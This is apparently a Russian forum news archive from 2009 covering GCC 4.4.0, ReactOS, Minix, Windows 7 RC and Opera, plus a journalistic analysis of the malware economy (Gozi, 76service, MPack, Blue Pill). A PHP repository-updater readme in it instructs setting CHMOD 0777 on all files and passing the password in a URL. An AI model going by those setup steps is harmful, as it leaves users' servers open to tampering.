Архив новостей (2004-2015 год)

Статус
Закрыто для дальнейших ответов.
Официальный релиз набора компиляторов GCC 4.4.0

gccegg-65.png

Вышел набор компиляторов GCC 4.4.0 с измененным лицензионным соглашением на runtime - "GCC RUNTIME LIBRARY EXCEPTION", убирающим некоторые ограничения лицензии GPLv3 для Runtime компонент набора компиляторов, что позволяет генерировать в GCC любой код, независимо от лицензии под которой он будет распространяться (например, в качестве runtime теперь можно использовать код для обеспечения работы виртуальных машин, обрабатывающих байткод, в том числе Java).

Основные изменения по сравнению с веткой GCC 4.3.x:

* Добавлен оптимизатор Graphite, основанный на полиэдральном промежуточном представлении - технологии оптимизации для обеспечения параллельного выполнения циклических операций. Оптимизация касается всех языков, поддерживаемых GCC. Разработка позволяет значительно увеличить производительность обычных приложений на многоядерных процессорах, созданных без использования специальных библиотек распараллеливания, например, Threading Building Blocks.
* Добавлены новый аллокатор регистров (IRA - integrated register allocator) и новый планировщик расстановки инструкций.
* Новые опции оптимизации: "-findirect-inlining", "-ftree-switch-conversion", "-ftree-builtin-call-dce" и "-fconserve-stack";
* Новые опции предупреждения о потенциальных ошибках в коде: "-Wparentheses", "-Wsequence-points", "-Wconversion", "-Wuninitialized" и т.д.
* Реализована поддержка версии 3 спецификации OpenMP (API для параллельных вычислений);
* Улучшена поддержка грядущего С++ стандарта C++0x, например, в libstdc++ добавлены заголовочные файлы chrono, condition_variable, cstdatomic, forward_list, initializer_list, mutex, ratio, system_error и thread;
* Произошли множественные изменения в поддержке языков C/C++/Fortran;
* Улучшена поддержка уже поддерживаемых архитектур: добавлены средства оптимизации для CPU ARM Cortex-A9, Cortex-R4 и Cortex-R4F, PowerPC e300c2, e300c3, e500mc, IBM System z10 EC/BC; добавлена поддержка встроенных функций Intel AES, Intel PCLMUL, Intel AVX; улучшена поддержка архитектур MIPS, AVR, IA-32/x86-64, IA-32/IA64, PowerPC и т.д.
* GCC стал считать ошибками некоторые программисткие "решения", который компилировались ранее. Например, теперь не работает "#elif" без аргумента; "cstdio" больше не подразумевает включение "string.h", "ios.h", "iomanip.h", "streambuf.h" и "locale.h", а "stdint.h" не включает "string.h" и "ios.h". ; строковые функции больше не принимают "char*" вместо "const char*"; ужесточены требования к инициализации C++ классов.

Разработчики Fedora уже ранее заявили о том, что версия 11 дистрибутива будет полностью скомпилирована GCC 4.4.0. Однако, работа предстоит немалая: при попытке пересборки новым компилятором 6228 пакетов дистрибутива было зафиксировано 559 ошибок.

Релиз|Release
 
Пожалуйста, обратите внимание, что пользователь заблокирован
1240384777653849eec5099918a.png
Из readme.txt:
# Создания репозитория
1. Выделяем на сервере поддомен (рекомендуется)
2. Открываем файл repository/index.php в нём прописываем пароль доступа к обновлению репозитория в переменную
# Пароль на репозиторий
$mypassword = 'password';

3. Закачиваем по ftp на него файл repository/index.php
4. Создаём папки с названиями проектов репозитория
5. Закачиваем в папки проектов, сами файлы этих проектов
6. Выставляем на все файлы и папки репозитория права CHMOD 0777
7. Запускаем наш скрипт создания/обновления репозитория следующими параметрами:
/repository/?update=password&project=test
Можно поставить обновления по крону, либо запускать руками после изменений в файлах.

# Установка клиента автообновления
1. Настраиваем файл cron.php под наш репозиторий и локальный пусть проекта.
2. Закачиваем на ftp файл cron.php
3. Создаём файл logs.html ставим на него права CHMOD 0777.
4. Ставим задание в крон, пример из панели DirectAdmin:
00 05 * * * cd /home/user/domains/domain.ru/public_html; /usr/bin/php -f cron.php >> logs.html
У вас оно может быть другое.

© Lonely Wolf 22.04.2009

###########################################################################################################

ChangeLog

########## 1.0 -> 1.1 [22.04.2009] ##########
[ + ] Добавлен контроль прав файлов (доступ на запись, доступ на чтение)
[ + ] Добавлен графический интерфейс
[ + ] Добавлен пароль на управление репозиторием
[ + ] Добавлен данный файл readme.txt с подробными инструкциями по установке и changelog'ом
[~] Исправлена ошибка с рекрусивным созданием папок






 
Команда разработчиков выпустила ReactOS 0.3.9

150px-ReactOS_logo.svg.png

Вышел новый релиз свободной операционной системы ReactOS - 0.3.9. В связи с приближением перехода на 0.4.0, основная работа проводится по исправлению ошибок, добавление новой функциональности сводится только к необходимому минимуму. В этом релизе такой минимум - базовая поддержка звука и улучшение сетевого стека.

Разработчики обращают внимание пользователей на то, что этот релиз, как и все из серии 0.3, имеет статус разработки "альфа", что означает - далеко не все программы будут работать, или вообще система может не запустится на аппаратном обеспечении пользователя.

Полный список изменений, внесенных с момента последнего релиза, можно посмотреть здесь.

Наиболее важные изменения:

* Снижены минимальные требования памяти до 32 Мб. В теории сейчас ReactOS можно установить имея 24 Мб ОЗУ и запускать всего-лишь с 20 Мб оперативной памяти
* В ядре реализован новый, более быстрый интерфейс "Hyperspace Mapping", что дало прирост производительности более, чем на 300%
* Улучшения в проверках безопасности в менеджере объектов повышают производительность на 500%. Особенно это заметно при работе с реестром или большими файлами
* Решены различные проблемы NDIS и AFD, что улучшило совместимость с драйверами сетевых карт и закалило сетевой стек
* Предварительная поддержка звука через новый сервис Kernel Streaming. Теперь стало возможным использовать драйвер ac97 через новую библиотеку Port Class для воспроизведения звука используя программу winamp
* Большая работа проделана над интерпретатором командной строки, чтобы сделать его более совместимым. Теперь он может исполнять сложные скрипты, включая нашу Среду Сборки (ReactOS Build Environment)
* Множество улучшений в части GDI, работающей в режиме ядра и отвечающей за отрисовку изображений
* Синхронизация большинства DLL с проектом Wine

:zns2: Домашняя страница
 
raccoon-3.jpg
Европейский исследовательский Совет (European Research Council) объявил итоги конкурса на разработку Unix-подобной надежной и безопасной операционной системы. Грант в размере 2,5 миллионов евро получила группа специалистов из Свободного университета (Vrije Universiteit) из Амстердама, работающая под руководством профессора Эндрю Таненбаума (Andrew Tanenbaum), создателя операционной системы Minix.
[New$paN]
Операционная система Minix позиционируется как более безопасное и надежное решение, чем Microsoft Windows, а также системы на базе ядра Linux.
По мнению профессора Таненбаума, ошибки в программном обеспечении будут всегда, поэтому основная задача состоит в том, чтобы создать операционную систему, способную самостоятельно исправлять такие ошибки.

В основе новой версии Minix лежит концепция микроядер. Она подразумевает, что операционная система будет состоять из нескольких компонентов, действующих независимо друг от друга. В случае возникновения ошибки в одном из компонентов, он будет блокирован, но это никак не повлияет на работу остальной системы.

В университете разработкой Minix занимаются три исследователя и два программиста. Полученный грант обеспечит финансирование этой группы как минимум в течение пяти лет.

Minix является одной из старейших операционных систем. Ее первая версия появилась около 20 лет назад. Она послужила прототипом для многих операционных систем на базе ядра Linux.

Среди студентов, изучающих теорию операционных систем по исходникам Minix, наибольшей известности достиг Линус Торвальдс, разработчик Linux.

Исходный код Minix 3 с переведёнными на русский язык комментариями можно получить на CD вместе с книгой «Операционные системы: разработка и реализация» (Таненбаум Э. С., Вудхалл А. С., 3-е издание опубликовано в России в 2007 году), в которой детально расписано строение ОС на примере Minix.

 
fd96591c458007fca8aefe8.jpg
Релиз-кандидат (RC) Windows 7 станет доступным со следующей недели, официально заявили в пятницу в корпорации Microsoft.

Разработчикам и IT-специалистам, подписанным на MSDN и TechNet, RC можно будет скачать уже 30 апреля, а для более широкого круга предфинальный вариант операционки станет доступным 5 мая.

В сообщении компании говорится, что Windows 7 Build 7100 доведена программистами Microsoft до стадии релиз-кандидата и сейчас эта система проверяется на наличие критических уязвимостей и ошибок внутри Microsoft. Кроме того, ограниченный доступ к системе уже получили несколько наиболее крупных и стратегически важных партнеров софтверного гиганта.

Как пояснили представители корпорации, релиз-кандидат в терминологии Microsoft означает разработку с полностью финализированным кодом, который предстоит лишь несколько подправить и подчистить в случае возникновения недостатков. Никаких дополнений и изменений в функционале на этом этапе в код уже не вносится.

Согласно официальным заявлениям компании, финальная версия Windows 7 выйдет в январе 2010 года. Однако, источники в Microsoft продолжают утверждать, что внутри компании была дана установка - представить на рынке Windows 7 уже осенью 2009 года.

Вместе с новостями о Windows 7 Microsoft сообщила, что новая система получит так называемый "Режим Windows XP", предназначенный для пользователей, пропустивших Windows Vista и сразу перешедших на Windows 7. На практике этот режим будет представлять из себя виртуальное мини-окружение, облегчающее запуск XP-приложений в Windows 7. C технической точки зрения "Режим Windows XP" базируется на технологии Virtual PC, правообладателем которой Microsoft стала еще в 2003 году, когда была куплена компания Connectix.

Эксперты говорят, что новая "фишка" решает одну из наиболее серьезных проблем Vista - несовместимость программного обеспечения для Windows XP в Windows Vista. Именно этот момент заставил тысячи корпоративных клиентов отказаться от покупки Vista.

Как пояснили в корпорации, в предыдущих бета-версиях Windows 7 "Режим Windows XP" отсутствовал, впервые он появится только в Release Candidate-версии. В конечной версии он также изначально поставляться не будет, но пользователи, которым эта разработка понадобится, смогут бесплатно скачать ее с сайта Microsoft. Работать "Режим Windows XP" будет только с версиями Professional, Enterprise и Ultimate.

"Режим Windows XP специально предназначен для малого бизнеса, переходящего с Windows XP на Windows 7. Эта функция предоставит многим пользователям необходимую им гибкость при работе со старым программным обеспечением", - сказал Скотт Вудгейт, представитель Microsoft.

По его словам, для того, чтобы старый софт без проблем работал в Windows 7, его необходимо не только использовать в "Режиме Windows XP", но и инсталлировать в нем же.



[mod][DiFor:] А у меня ДР 5го мая. Неплохой подарок))[/mod]
 
e6ce59d7171719d592d81bb.jpg
Пятнадцать лет назад двое учёных научно-исследовательской лаборатории компании, ныне известной как Telenor, готовились взяться за новый проект. Они собирались создать свой собственный веб-браузер. Первые строки кода впоследствии превратились в браузер Opera. Йон фон Течнер (Jon von Tetzchner), главный исполнительный директор Opera Software, и Гейр Иварсой (Geir Ivarsøy) начали создавать оригинальный веб-браузер для настольных систем в апреле 1994 г.
[New$paN]
Сегодня браузерами Opera на компьютерах под управлением Windows, Mac и Linux пользуются около 40 млн человек.

«Мы с Гейром понимали, что веб навсегда изменит образ жизни, работы, развлечений, и веб-браузер должен стать инструментом этих изменений», - подчеркнул Йон фон Течнер. – Сегодня я горжусь достижениями компании и сообщества приверженцев Opera. В следующие 15 лет миллиарды людей станут пользователями Всемирной сети и я уверен, что мы сможем дать им больше поводов использовать Opera – ведь все хотят работать с хорошим браузером независимо от того, где и как используется Интернет».

Браузер Opera для настольных компьютеров стал первым шагом к созданию единого кросс-платформенного ядра. Оно способно работать на многих аппаратных средствах, и сегодня Opera предлагает доступ в Интернет с помощью самого широкого ассортимента устройств. Телевизоры, ТВ-приставки, медиаплееры, мобильные телефоны, игровые консоли, автомобили и, конечно, компьютеры – все эти устройства делают браузеры Opera доступными сотням миллионов пользователей по всему миру.
Потребности пользователей – именно на это делают упор в компании с момента создания первого браузера. Opera Desktop предложил новые возможности, чтобы сделать Интернет более продуктивным и полезным.

Первый релиз Opera содержал основу для использования вкладок, позволяющих загружать и просматривать одновременно несколько веб-страниц в одном окне браузера.

В 2001 г. компания Opera предложила инструмент Mouse Gestures, который радикально улучшил навигацию по Всемирной сети. Система Speed Dial, позволяющая быстро открывать сайты с главной панели браузера, и механизм синхронизации Opera Link существенно упростили работу с закладками независимо от того, какое устройство используется для доступа в Сеть. Всё это дало импульс развитию новой функциональности браузеров.В этом году компания Opera представила технологию Opera Turbo, которая позволяет сжимать содержимое веб-страниц и быстро загружать их даже при невысокой скорости Интернет-соединения.

Помимо основных функций браузера, за время, прошедшее с момента появления пакета, в него были интегрированы возможности почтового/новостного клиента Opera Mail, адресной книги, клиента пиринговой сети BitTorrent, агрегатора RSS, клиента IRC, менеджера закачек, WAP-браузера, Opera Link, а также виджеты — графические модули, основанные на технологии HTML и работающие вне окна браузера.

Браузер Opera портирован под несколько операционных систем (включая Microsoft Windows, Mac OS X, GNU/Linux, FreeBSD, Solaris а также для мобильных платформ на основе symbian) и платформ (Intel, Sparc, PowerPC). Доля Opera на мировом рынке браузеров уступает долям Internet explorer, Mozilla Firefox и safari. Но в отдельных регионах доля рынка, занимаемая Opera, существенно выше среднего показателя по миру. В первую очередь это относится к некоторым странам Восточной Европы, включая Россию, в которой доля Opera составляет, по разным оценкам, от 13 до 24 %.

Значительно сильнее позиции Opera на рынке браузеров для мобильных устройств: мобильных телефонов, смартфонов и КПК, где Opera играет доминирующую роль благодаря технологии Small Screen Rendering. В этом сегменте рынка браузер представлен версиями для Windows Mobile, S60 и UIQ, а также для платформы Java ME. Opera предустановлена более чем на 40 миллионах мобильных телефонов во всём мире. Opera также единственный браузер для игровых систем Nintendo DS и Wii. Некоторые компьютерные телеприставки также используют Opera. Движок Opera (Presto) лицензирован Adobe и интегрирован в пакет Adobe Creative Suite.

 
Экономика без опасности или анализ рынка malware индустрии


Можно долго говорить о противостоянии технологий "нападения" и "защиты" в информационной безопасности, но на самом деле речь всегда идет о противостоянии людей. Вредоносное ПО и антивирусы не борются друг c другом - они лишь делают то, для чего предназначены. И проблемы, связанные с ИБ, не только технические, но и во многом социальные, требуют анализа и поиска способов решения.
[New$paN]

Нарисованная дверь

Представители антивирусных компаний не устают напоминать журналистам и пользователям, что противостоят не кучке студентов-вирусописателей, занимающихся самоутверждением, а мощной преступной индустрии, в которой задействовано множество людей и крутятся немалые деньги и которая, в свою очередь, противостоит антивирусным компаниям. Дело поставлено на поток, объем вредоносного ПО растет как снежный ком, а в арсенале вирусописателей появляются все новые и новые технологии. "Количество записей в антивирусной базе каждый год примерно удваивается", - говорит Виталий Камлюк, старший вирусный аналитик "Лаборатории Касперского", - и это еще довольно осторожная оценка. Однако важны не только количественные, но и качественные характеристики эволюции мира компьютерной преступности. Сейчас он представляет собой сложную структуру, в которой собственно разработчики зловредного ПО - лишь одно из звеньев.

Исследователю из компании SecureWorks Дону Джексону (Don Jackson) удалось заглянуть в мир современного malware практически изнутри. Все началось в январе 2007 года, когда один знакомый попросил Дона посмотреть на странную "экзешку", непонятно как появившуюся на его компьютере. Файл (Джексон назвал его Gozi [Вообще-то, поначалу он назвал его pesdato (это слово встречается в коде), но когда узнал, что оно означает по-русски, переименовал открытие]), оказался неизвестным на тот момент антивирусной науке (то есть zero-day) трояном, который перехватывал персональные данные, вводимые пользователем в веб-форме при работе с системами онлайн-банкинга. Потратив несколько дней на изучение "неведомой зверюшки", Джексон вышел на сайт 76service.com, встретивший его лаконичной формой для ввода логина и пароля. Это была словно нарисованная на холсте дверь, ведущая в неведомый мир владельцев Gozi.

Изучая форумы кардеров, Джексон наткнулся на группу HangUp Team (предположтельно располагающуюся в Архангельске), которая имела какое-то отношение к Gozi и 76service. Сделав несколько неудачных попыток получить тестовый доступ к сервису (провалившихся во многом из-за незнания русского языка), Джексон, в конце концов, раздобыл заветный "золотой ключик" через своего знакомого, расследовавшего деятельность HangUp Team. Дверь открылась.


Комментарий

Из беседы с Виталием Камлюком, старшим вирусным аналитиком "Лаборатории Касперского".
Не возникнет ли ситуация, при которой мне придется тратить 99% ресурсов своего компьютера на работу антивируса и 99% трафика на обновление его баз?

- Сейчас обновления не столь большие. Антивирусные записи хранятся компактно, они не содержат в себе мегабайты кода. Движок построен так, что значительный рост числа записей не сильно влияет на скорость работы движка. База может быть гигантской, она может быть в сто раз больше, и скорость упадет незначительно.
То есть у этой технологии есть запас - скажем, лет на пять?

- Я думаю, что на больший срок. Проблема в другом: как справляться с этим потоком? Штат компании не может расти экспоненциально. Мы и не растем, это проигрышная стратегия - расти вслед за вирусным кодом. Мы разрабатываем технологии, которые позволяют обрабатывать весь этот вирусный поток. В ответ на автоматизацию процесса написания вирусов у нас есть своя автоматизация. Трояны сходят с "конвейера", мы их аккуратненько поднимаем и переносим на наш конвейер, где автоматически детектируем, не задействуя человеческие ресурсы.
Это понятно, но ломать не строить: запутывать код проще, чем распутывать, и т. д. Вы будете на шаг позади…

- Нам просто нужно работать эффективнее, быть гораздо сильнее и умнее, чем они. У нас разные уровни: у вирусописателей технический уровень может быть ниже, чем у вирусного аналитика. Так или иначе, это подпольное предприятие, и все понимают, что оно временное. Там все-таки нет уверенности, как у настоящей индустрии, хотя мы и называем ее так из-за масштабов и довольно сложной структуры.


Malware as a service

Увиденное за дверью стало для Джексона полной неожиданностью. Gozi оказался не внутренней разработкой взломщиков, созданной для своих нужд. Не предназначался троян и для продажи. Он был основой сервиса, своебразного криминального магазина самообслуживания. Пользователь системы, имеющий аккаунт, мог подписаться на доступ в течение месяца к информации, поступающей с каких-то Gozi-инфицированных машин по цене от $1000 за штуку. Войдя в систему, пользователь видел список "своих" троянов и мог анализировать полученные от них "передачи". Насколько удачным оказывался "улов" и как клиент преобразовывал украденные данные в деньги - было уже проблемой подписчика. Чаще всего подписчики продавали добытые сведения на черном рынке тем людям, которые непосредственно занимались снятием денег со счетов и покупкой товаров, и реже использовали эти сведения самостоятельно.

Владельцы 76service этим не занимались - точнее, могли не заниматься. Они в первую очередь предоставляли сервис и делали все на благо своих клиентов. Помимо базового комплекта, за небольшую плату они могли провести дополнительный анализ и просеивание информации - например, отобрать из всех поступающих данных только те, которые относились к клиентам определенного банка.

Все как в "большом мире". Не единичные "спецоперации" - атаки и взлом компьютеров, - а хорошо отлаженный механизм, конвейер и готовое "решение" (выражаясь современным бизнес-языком), допускающее четкое разделение труда и создание длинных цепочек потребления. На примере Gozi и 76service мы видим развитие теневой экономики malware. Борьба с киберпреступностью будет неэффективна до тех пор, пока не будут учитываться свойства этой экономики.

В настоящий момент сайт 76service.com не открывается, а троян Gozi детектируется основными антивирусами. Но это трудно назвать победой: в середине марта 2007 сайт тоже на время закрывался, но спустя буквально несколько дней он появился вновь, переехав на хостинг где-то в Гонконге и выпустив новую версию трояна. Вполне вероятно, что сейчас функционирует аналогичный сервис, работающий на другом домене и использующий очередную модификацию трояна, сигнатура которого еще не добралась до антивирусных баз. Может быть, он перехватывает данные и с вашего компьютера всякий раз, когда вы вводите свой платежный пароль в Яндексе.


Тараканьи бега

Для простоты, будем считать, что какой-то большой и сложный продукт - например, Windows 2000 - содержит 1 миллион ошибок, причем каждая ошибка "проявляется" в среднем раз в 1 миллиард часов. Предположим, что Падди работает на Ирландскую Республиканскую армию и его задача - взломать компьютер Британской армии, чтобы получить список информаторов в Белфасте; задача Брайана - остановить Падди. Чтобы это сделать, ему нужно узнать об ошибках первым.

Падди работает в одиночку и может потратить на тестирование только тысячу часов в год. У Брайана есть доступ к полному исходному коду Windows, десятки кандидатов наук в подчинении, контроль за исследовательскими коммерческими компаниями, прямой доступ к CERT и соглашение об обмене информацией с компетентными службами Англии и США. Кроме того, он имеет возможность посылать консультантов на стратегически важные объекты (например, в сфере энергетики и телекоммуникаций), дабы объяснять сотрудникам этих объектов, как им лучше защищать свои системы. Допустим, что Брайан и его подчиненные тратят в общей сложности 10 миллионов часов в год на тестирование.

Через год Падди найдет одну ошибку, тогда как Брайан найдет сто тысяч. Однако вероятность того, что Брайан нашел ту же ошибку, что и Падди, равна 10%. Через десять лет он найдет ее - но за это время Падди найдет еще девять, и вряд ли Брайан будет к тому моменту знать их все. Более того: отчеты Брайана об ошибках станут литься таким потоком, что Microsoft просто перестанет обращать на них внимание.

Ross Anderson, "Why Information Security is Hard - An Economic Perspective"


Сделай сам

История 76service - лишь эпизод, показывающий, как сейчас выглядит индустрия malware. Другой тревожный сигнал - появление множества "наборов юного взломщика" и конструкторов "сделай троянца своими руками". Подобные приложения позволяют легким движением руки комбинировать последние достижения передовой мысли компьютерного андеграунда, создавая уникальные средства заражения. В качестве примера можно привести MPack - набор серверных скриптов (классическая связка PHP+MySQL) с дружественным интерфейсом и удобной системой администрирования, позволяющий проникать в компьютер жертвы и устанавливать на нем вредоносное ПО с помощью одного из множества эксплойтов в популярных программах, а также через iframe-дыры на сайтах. Как и положено, программа умеет автоматически обновлять свои базы дыр. Вам это ничего не напоминает? По данным PandaLabs на лето этого года, стоит такая игрушка около тысячи долларов - не слишком высокая цена за подобное чудо технической мысли.

"Продолжающаяся разработка MPack свидетельствует о том, что преступники вовсю используют преимущества онлайнового мира для получения прибыли, - пишет исследователь компании Symantec Хон Ло (Hon Lau) в корпоративном блоге. - В компьютерной преступности риск быть пойманным очень мал; еще меньше риск физической опасности… Поэтому неудивительно, что новые типы атак и апдейты к существующим продолжают появляться".

Есть и гораздо более дешевые решения - 20–40 долларов за штучку (TrafficPro). Есть конструкторы (такие как Pinch), позволяющие с помощью интуитивно понятного интерфейса настроить все параметры будущего трояна (протокол обратной связи, способ автозапуска, вид деятельности, метод кодирования, необходимость отключения антивирусного ПО и т. д.). Есть удобные системы, позволяющие рассылать спам и заражать форумы, работающие на самых разных движках.

Порог вхождения в индустрию компьютерной преступности снизился до минимума. Открытые форумы взломщиков можно найти с помощью Google, а чтобы выйти на виртуальную "большую дорогу" и начать "зарабатывать" реальные деньги, достаточно иметь несколько десятков долларов стартового капитала. В то же время техническое оснащение взломщиков вполне сопоставимо с техническим оснащением антивирусных компаний.
Опасная глобальность

Процветание и устойчивость экономики компьютерной преступности обусловлены рядом причин, порой уникальных. Редактор CSO Magazine Скотт Беринато говорит о проблеме "распределенного ущерба" (distributed pain): если украсть у миллиона людей по одному доллару, скорее всего никто из них этого даже не заметит - и уж точно не станет вызывать полицию и писать жалобы, даже если "ограбление" происходит с регулярностью раз в месяц. А современные глобальные технологии позволяют делать именно это. Примерно той же позиции придерживаются многие банки - защищая свои системы настолько, насколько этого требует законодательство, они готовы списывать периодические потери от киберпреступности на "допустимые издержки" (закладывая их, естественно, в стоимость своих услуг, процентные ставки и т. д.).

"Аналогичная ситуация с правоохранительными органами, - Скотт цитирует Джима Малони (Jim Maloney), бывшего CSO Amazon.com, в настоящий момент - владельца собственный консалтинговой компании. - До тех пор, пока не поступит достаточно информации от множества жертв и не станет ясно, что речь идет об одной большой проблеме, необходимых для ее решения ресурсов просто никто не выделит".

С другой стороны, распределенная структура преступных корпораций и длинные "цепочки потребления" позволяют "размазывать" риски по всем участникам этого рынка - точно так же, как в наркобизнесе. Разделение труда приводит к повышению устойчивости всей системы. Для наркомафии арест одного наркокурьера - все равно что слону дробинка. Так и арест одного разработчика трояна не затронет "клиентов" его сервиса, и через какое-то время аналогичный сервис появится в другом месте и с участием других людей.


Враг государства

Мир информационный безопасности подвергался государственному регулированию с самых первых дней своего существования, хотя поначалу это регулирование не имело ничего общего с вопросами честной конкуренции. Первые действия касались нераспространения: государство использовало экспортные лицензии и контроль над финансированием исследований, чтобы ограничить доступ к криптографии на как можно более долгий срок. Этот процесс прекратился лишь к началу нынешнего века.

Ландфехр (Landwehr) описывает попытки правительства США разобраться с проблемой "лимонного рынка" в мире компьютерной безопасности, начатые в середине 1980-х. Во-первых, речь идет об исправлении схемы государственного тестирования и сертификации ПО (о так называемой "Оранжевой Книге", "Orange Book"), но это исправление лишь породило новые проблемы. Желание менеджеров упростить процесс сертификации самого свежего софта привело к тому, что производителям было достаточно показать, что процесс начат, хотя зачастую он так никогда и не заканчивался. Также возникали проблемы взаимодействия с системами союзников - Англии, Германии и пр.

Регулирование значительно улучшилось, когда неудачи рыночного механизма в индустрии информационной безопасности стали ясны. Евросоюз принял документ "Network Security Policy", который установил общеевропейский ответ на атаки на информационные системы. Это послужило началом применения экономических мер при планировании государственного управления. Другой пример: комментарии правительства Германии по поводу инициативы Trusted Computing. Они сильно повлияли на Trusted Computing Group, заставив ее согласиться с принципами членства, исключающими дискриминацию небольших предприятий. Недавно Еврокомиссия высказывала свои соображения об экономических последствиях механизмов безопасности Windows Vista.


Трагедия общин и вопрос ответственности

Еще один важный вопрос, поднятый патриархом экономического анализа информационной безопасности Россом Андерсоном (Ross Anderson): кто отвечает за безопасность? Очевидно, что ответственность за безопасность должна возлагаться на того, кто имеет возможность ее обеспечивать. Однако в условиях, когда компьютер домохозяйки может использоваться для атаки на сайт Microsoft, а неграмотно настроенный SMTP-сервер - поставить под удар всю сеть, в которой он находится, это далеко не тривиальная проблема. Сколько вы готовы заплатить за то, чтобы обеспечить безопасность Microsoft? Думаю, немного. И уж конечно, вы практически ничем не рискуете, отказываясь от добровольной помощи редмондскому гиганту - Microsoft вряд ли будет судиться с вами в случае участия вашего компьютера в DDoS-атаке (как мы уже видели, бороться с отдельными участниками распределенной угрозы никто не будет, кроме разве что RIAA и MPAA, но этот клинический случай мы не рассматриваем).

В экономике такая ситуация известна под названием "трагедия ресурсов общего пользования" (Tragedy of the Commons) и описывается обычно так. Пусть 100 жителей деревни пасут своих овец на общинной земле. Если кто-то из них добавляет лишнюю овцу в свое стадо, он получает существенную выгоду, тогда как остальные 99 жителей страдают лишь от незначительного ухудшения состояния пастбища. Вряд ли они поднимут вой по этому поводу - скорее сами добавят по овце. Со временем такая стратегия приводит к безграничному росту общего числа овец и полному истощению земли.

Подобные ситуации, когда эгоистичные (или рациональные, что в данном случае одно и то же) действия отдельных участников сообщества по отношению к общественному ресурсу приводят к краху всей системы, наблюдаются в компьютерной безопасности буквально на каждом шагу. Общественным ресурсом в данном случае является общая безопасность информационной среды, стоимость которой распределяется между участниками. Например, пользователь локальной сети, купив соответствующее ПО и упрочив защиту своего компьютера, повышает общую безопасность.Однако стимул вкладывать личные деньги, по сути, в общее дело невелик: возникает соблазн подождать, когда это сделают другие (а они этого не сделают по тем же самым причинам). Аналогичным образом замена устаревших технологий новыми безопасными аналогами (например, DNSSEC вместо существующего DNS) идет черепашьими темпами: поскольку на начальном этапе (когда пользователей новой технологии немного) затраты велики, каждый участник рынка ждет, когда их возьмет на себя кто-то другой. Социальных механизмов борьбы с этим явлением пока не существует.

Андерсон приводит еще один пример, связанный с ответственностью: он касается банков и их взаимоотношения с клиентами. Если кто-то украл деньги с какого-то банковского счета, то виноватым может оказаться как банк (например, использовалась небезопасная инфраструктура для аутентификации пользователей или украдена база данных), так и клиент (например, записал пароль на бумажке, наклеенной на монитор офисного компьютера, а файл с цифровым сертификатом положил на "Рабочий стол"). По законодательству США, действует презумпция виновности банка: ему придется доказывать, что "лоханулся" пользователь, либо возмещать убытки. Во многих европейских странах ситуация противоположная. Нетрудно догадаться, что банки США в среднем лучше и эффективнее защищают свои системы, хотя и тратят на это меньше денег.


Нельзя продать? Отдадим даром!

В условиях отсутствия легального рынка уязвимостей, единственное, что получает исследователь, публикующий свои изыскания - известность, имя и славу. В такой ситуации говорят об "экономике репутаций". Когда-то именно вопрос репутации был основным движущим фактором развития вредоносного кода. Впрочем, в индустрии безопасности имя можно конвертировать в деньги сравнительно просто: громкое "разоблачение" может стать неплохим пиаром и привести к исследователю толпы клиентов, жаждущих безопасности (даже от мнимых угроз).

Во время обсуждения ситуации вокруг руткита Blue Pill Виталий Камлюк сказал, что, с его точки зрения, публикация кода руткита была поступком не очень этичным и может оказаться помощью "темной стороне". Мы попросили Джоанну Рутковску прокомментировать это мнение.

"Конечно, у меня другой взгляд. Во-первых, заметьте, что эксплойты и proof-of-concept-код (например, Blue Pill) не создают новых уязвимостей в системе - они только используют уже существующие уязвимости. Если бы компьютерные системы были правильно спроектированы и реализованы, эксплойтов не было бы. Публично доступные эксплойты и другой подобный код только показывают возможные опасности и позволяют изучать возможные способы противодействия таким проблемам.

Должна сказать, что очень удивлена позицией, высказанной "Лабораторией Касперского". Как производитель систем безопасности, они должны быть благодарны другим исследователям за публикацию своих результатов, которые позволяют (например, самой "Лаборатории Касперского") работать над предотвращением таких угроз.

Пожалуйста, учитывайте также, что опубликованная версия Blue Pill не может считаться malware, поскольку не содержит никакого вредоносного кода. Эта базовая версия лишь устанавливает очень "тощий" гипервизор и перемещает запущенную в данный момент ОС в виртуальную машину, контролируемую гипервизором. Ничего больше! Конечно, кто-то может использовать этот скелет для создания перехватчика паролей, но точно так же можно представить себе создание системы-ловушки (honeypot system), отладчика или даже anti-rootkit-системы на основе нашего скелета.

Более того, Blue Pill не использует никаких дыр, а полагается только на документированную функциональность, как она описана в руководствах AMD. Так что его даже нельзя классифицировать как эксплойт."


Почем лимоны?

Впрочем, описанные проблемы - это не все плохое, что бывает на свете. Даже если мы распределим ответственность правильно, это будет только шагом на пути к безопасности. Дело в том, что в современных условиях рыночные механизмы не могут обеспечивать выигрыш более защищенных систем в свободной конкурентной борьбе. Это связано с тем, что рынок ИТ представляет собой рынок с асимметричной информацией, на котором продавец обладает более подробными и точными данными о товаре, чем покупатель.

За изучение подобных рынков американский экономист Джордж Акелроф получил в 2001 году Нобелевскую премию по экономике. Предложенная им модель довольно проста; она носит название "лимонного рынка". Рассмотрим рынок подержанных машин. Допустим, что на нем продаются как хорошие авто ("сливы", объективная цена которых - $3000), так и "битые" ("лимоны", стоящие реально $1000), причем покупатель не может отличить одни от других (пока не проедет пару тысяч миль). Если предположить, что вероятность "наколоться" составляет 50%, складывается впечатление, что равновесная рыночная цена должна быть по $2000 за машину; однако по такой цене никто не будет продавать "сливы", и рынок заполонят "лимоны". Как только покупатели это обнаружат, рыночная цена упадет вообще до $1000.

Мораль: в условиях отсутствия информации у покупателей рынок подталкивает производителей к поставке некачественного товара. Именно это и происходит с безопасностью: несмотря на все исследования, пользователь никогда не может достоверно оценить степень защищенности того или иного продукта, и ему приходится полагаться на заявления производителя. К чему это приводит, мы уже видим.


Блошиные рынки

Можно пытаться решить проблему оценки надежности экономическими методами. Безопасность системы может быть оценена через стоимость новой (zero-day) уязвимости, найденной для этой системы. Это логично: чем надежнее система, тем больше людей ей доверяют, тем эффективнее будет zero-day-атака и тем дороже информация для ее осуществления; и наоборот: если система надежна, нам придется крепко поработать и потратить много денег, чтобы ее взломать. Проблема в том, что открытого легального рынка уязвимостей, который бы позволял оценивать их настоящую стоимость, в настоящий момент практически не существует, и даже не вполне понятно, каким он должен быть, чтобы приносить наибольшую пользу обществу.

